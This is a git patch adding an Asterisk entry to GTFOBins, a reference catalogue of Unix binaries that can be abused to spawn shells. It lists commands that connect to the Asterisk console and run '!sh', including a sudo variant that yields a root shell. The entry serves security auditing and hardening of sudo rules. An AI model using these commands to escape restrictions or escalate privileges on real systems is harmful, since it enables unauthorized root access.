From f29e143475a9ee6616df0bfb65019188b61abb40 Mon Sep 17 00:00:00 2001 From: Chocapikk Date: Tue, 5 Aug 2025 10:27:37 +0200 Subject: [PATCH] Add asterisk --- _gtfobins/asterisk.md | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) create mode 100644 _gtfobins/asterisk.md diff --git a/_gtfobins/asterisk.md b/_gtfobins/asterisk.md new file mode 100644 index 00000000..8e660a95 --- /dev/null +++ b/_gtfobins/asterisk.md @@ -0,0 +1,18 @@ +--- +functions: + shell: + - description: Connect to the Asterisk console and drop into a shell + code: | + asterisk -r + code: | + !sh + sudo: + - description: Start Asterisk as root in the foreground to create its CLI socket + code: | + sudo asterisk -F + - description: Connect to the Asterisk console as root and drop into a shell + code: | + sudo asterisk -r + code: | + !sh +---